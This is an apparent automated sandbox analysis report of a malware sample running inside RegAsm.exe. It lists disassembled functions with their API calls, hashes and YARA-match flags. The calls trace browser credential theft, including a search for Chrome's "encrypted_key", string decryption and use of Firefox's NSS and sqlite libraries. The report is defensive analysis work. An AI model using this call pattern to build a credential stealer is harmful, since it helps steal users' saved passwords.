                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1B48A2
                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C1B48C4
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6C1B48D8
                                                                                                        • memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6C1B48FB
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6C1B4908
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C1B4947
                                                                                                        • SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C1B496C
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1B4988
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C2D8DAC,?), ref: 6C1B49DE
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1B49FD
                                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1B4ACB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 4201528089-0
                                                                                                        • Opcode ID: d203e7f1260720044089bcebe7a905fd6fa5a1db7986dd2392d541565b5e2fac
                                                                                                        • Instruction ID: 1e9505b9f8ca8d3783252118abfbdaf614a7542c5a6772391cf9aced906ef491
                                                                                                        • Opcode Fuzzy Hash: d203e7f1260720044089bcebe7a905fd6fa5a1db7986dd2392d541565b5e2fac
                                                                                                        • Instruction Fuzzy Hash: 54511170A043058BEB108F75DC81B9B77E4AF61308F11C129ED1ABAB91EBB5D458CF66
                                                                                                        Function 0041580D Relevance: 18.2, APIs: 12, Instructions: 188stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00415845
                                                                                                        • _memset.LIBCMT ref: 00415856
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                          • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 004121E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0041595C,?), ref: 004121F2
                                                                                                        • StrStrA.SHLWAPI(00000000), ref: 0041596A
                                                                                                        • GlobalFree.KERNEL32(?), ref: 00415A8C
                                                                                                          • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                          • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                          • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                          • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00415A18
                                                                                                        • StrCmpCA.SHLWAPI(?,00436645), ref: 00415A35
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415A54
                                                                                                        • lstrcatA.KERNEL32(?,00436A8C), ref: 00415A65
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 4109952398-0
                                                                                                        • Opcode ID: 335cae6fd84b161df0984b00945f78d1a2dbd4c9e607e0e721f01f6bbc35d457
                                                                                                        • Instruction ID: 4905153569d8748fa83d0ede9c9d82dcbc9816826170d9825a589ea8a61000d7
                                                                                                        • Opcode Fuzzy Hash: 335cae6fd84b161df0984b00945f78d1a2dbd4c9e607e0e721f01f6bbc35d457
                                                                                                        • Instruction Fuzzy Hash: F8713DB1D4022D9FDF20DF61DC45BCA77BAAF88314F0405E6E908A3250EA369FA58F55
                                                                                                        Function 6C282D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • sqlite3_initialize.NSS3 ref: 6C282D9F
                                                                                                          • Part of subcall function 6C13CA30: EnterCriticalSection.KERNEL32(?,?,?,6C19F9C9,?,6C19F4DA,6C19F9C9,?,?,6C16369A), ref: 6C13CA7A
                                                                                                          • Part of subcall function 6C13CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C13CB26
                                                                                                        • sqlite3_exec.NSS3(?,?,6C282F70,?,?), ref: 6C282DF9
                                                                                                        • sqlite3_free.NSS3(00000000), ref: 6C282E2C
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282E3A
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282E52
                                                                                                        • sqlite3_mprintf.NSS3(6C2EAAF9,?), ref: 6C282E62
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282E70
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282E89
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282EBB
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282ECB
                                                                                                        • sqlite3_free.NSS3(00000000), ref: 6C282F3E
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C282F4C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1957633107-0
                                                                                                        • Opcode ID: a7ced5a654bb510b43b7bb1ace1689e4583ae617ecc6423539a9ff0c671a06e7
                                                                                                        • Instruction ID: 60253af7fa3e9e50b52af33ffff753670432a73cd75917cfce1b263ae40d9567
                                                                                                        • Opcode Fuzzy Hash: a7ced5a654bb510b43b7bb1ace1689e4583ae617ecc6423539a9ff0c671a06e7
                                                                                                        • Instruction Fuzzy Hash: 186163F5E0221A8BEB00CF68D894BDE77B1EF58349F144024EC59A7781E735E859CBA1
                                                                                                        Function 6C1D2C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(6C1D3F23,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23,?), ref: 6C1D2C62
                                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23,?), ref: 6C1D2C76
                                                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23,?), ref: 6C1D2C86
                                                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23,?), ref: 6C1D2C93
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23,?), ref: 6C1D2CC6
                                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23,?), ref: 6C1D2CDA
                                                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C1CE477,?,?,?,00000001,00000000,?,?,6C1D3F23), ref: 6C1D2CEA
                                                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C1CE477,?,?,?,00000001,00000000,?), ref: 6C1D2CF7
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C1CE477,?,?,?,00000001,00000000,?), ref: 6C1D2D4D
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1D2D61
                                                                                                        • PL_HashTableLookup.NSS3(?,?), ref: 6C1D2D71
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1D2D7E
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                        • String ID:
                                                                                                        • API String ID: 2446853827-0
                                                                                                        • Opcode ID: a660a47d6022711875fcf074786c01550463ccd247af2f63303bb2ca088e1f50
                                                                                                        • Instruction ID: 54edf08d44283e9717dbb7ffbd65940c4f64238e335da8eaa8f77f955ad7a226
                                                                                                        • Opcode Fuzzy Hash: a660a47d6022711875fcf074786c01550463ccd247af2f63303bb2ca088e1f50
                                                                                                        • Instruction Fuzzy Hash: CC51F376E00604AFDB009F24EC85AAAB778FF25218F058524EC2897B11E731FD64C7E2
                                                                                                        Function 6C134C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134C97
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CB0
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CC9
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134D11
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134D2A
                                                                                                        • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134D4A
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134D57
                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134D97
                                                                                                        • PR_Lock.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134DBA
                                                                                                        • PR_WaitCondVar.NSS3 ref: 6C134DD4
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134DE6
                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134DEF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3388019835-0
                                                                                                        • Opcode ID: 67f1515208def38120333ab9119d679ded665892caf3794a3190cf7ed0e14aaa
                                                                                                        • Instruction ID: 424b64ee2a97ab7dedfb2fd691f98900ca5087d3cf1fe71cb90a6f4f9337316b
                                                                                                        • Opcode Fuzzy Hash: 67f1515208def38120333ab9119d679ded665892caf3794a3190cf7ed0e14aaa
                                                                                                        • Instruction Fuzzy Hash: A2418EB5A04765CFCB00EF78D484299BBB8BF16318F065669DC8C9BB10E731D884CB91
                                                                                                        Function 00428B14 Relevance: 18.1, APIs: 12, Instructions: 95COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3833677464-0
                                                                                                        • Opcode ID: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
                                                                                                        • Instruction ID: 316f7d86b509052675ed64499f597221969422cd52b172cd7ffbd25416df4cfd
                                                                                                        • Opcode Fuzzy Hash: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
                                                                                                        • Instruction Fuzzy Hash: 392126B1705621BADB217F26F802D4FBBE0DF91758BA0842FF48446261DF39A840C65D
                                                                                                        Function 004015E6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004015BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 004015C6
                                                                                                          • Part of subcall function 004015BC: HeapAlloc.KERNEL32(00000000), ref: 004015CD
                                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00401606
                                                                                                        • GetLastError.KERNEL32 ref: 0040160C
                                                                                                        • SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00401614
                                                                                                        • GetWindowContextHelpId.USER32(00000000), ref: 0040161B
                                                                                                        • GetWindowLongW.USER32(00000000,00000000), ref: 00401623
                                                                                                        • RegisterClassW.USER32(00000000), ref: 0040162A
                                                                                                        • IsWindowVisible.USER32(00000000), ref: 00401631
                                                                                                        • ConvertDefaultLocale.KERNEL32(00000000), ref: 00401638
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401644
                                                                                                        • IsDialogMessageW.USER32(00000000,00000000), ref: 0040164C
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00401656
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040165D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 3627164727-0
                                                                                                        • Opcode ID: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
                                                                                                        • Instruction ID: 597bc7deab9f95c5419af2560a3a18d661806b2e942c9da5f2f727d66e905f75
                                                                                                        • Opcode Fuzzy Hash: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
                                                                                                        • Instruction Fuzzy Hash: 17014672402824FBC7156BA1BD6DDDF3E7CEE4A3527141265F60A910608B794A01CBFE
                                                                                                        Function 6C1D8F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D8FAF
                                                                                                        • PR_Now.NSS3(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D8FD1
                                                                                                        • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D8FFA
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C1D9013
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C1D9042
                                                                                                        • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D905A
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C1D9073
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C1D90EC
                                                                                                          • Part of subcall function 6C1A0F00: PR_GetPageSize.NSS3(6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F1B
                                                                                                          • Part of subcall function 6C1A0F00: PR_NewLogModule.NSS3(clock,6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F25
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C1D9111
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
                                                                                                        • String ID: n,l
                                                                                                        • API String ID: 2831689957-3692751573
                                                                                                        • Opcode ID: aeb3df37d19621e4c4aa6f30549b752c68140ccad8b429332f572d4c5c263965
                                                                                                        • Instruction ID: 2c01db624ed488db94e8673b7475fe49b0e6559b9fc33b581e0eb012dbbe0221
                                                                                                        • Opcode Fuzzy Hash: aeb3df37d19621e4c4aa6f30549b752c68140ccad8b429332f572d4c5c263965
                                                                                                        • Instruction Fuzzy Hash: CB519C75A046048FDF00EF78C4E8299BBF8BF4A314F0645A9DC459BB45EB35E885CB91
                                                                                                        Function 6C1BE910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149memorystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C1BE93B
                                                                                                        • PR_SetError.NSS3(FFFFE075,00000000), ref: 6C1BE94E
                                                                                                        • PORT_Alloc_Util.NSS3(00000001), ref: 6C1BE995
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C1BE9A7
                                                                                                        • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6C1BE9CA
                                                                                                        • PORT_Strdup_Util.NSS3(6C2F933E), ref: 6C1BEA17
                                                                                                        • PORT_Alloc_Util.NSS3(00000001), ref: 6C1BEA28
                                                                                                          • Part of subcall function 6C210BE0: malloc.MOZGLUE(6C208D2D,?,00000000,?), ref: 6C210BF8
                                                                                                          • Part of subcall function 6C210BE0: TlsGetValue.KERNEL32(6C208D2D,?,00000000,?), ref: 6C210C15
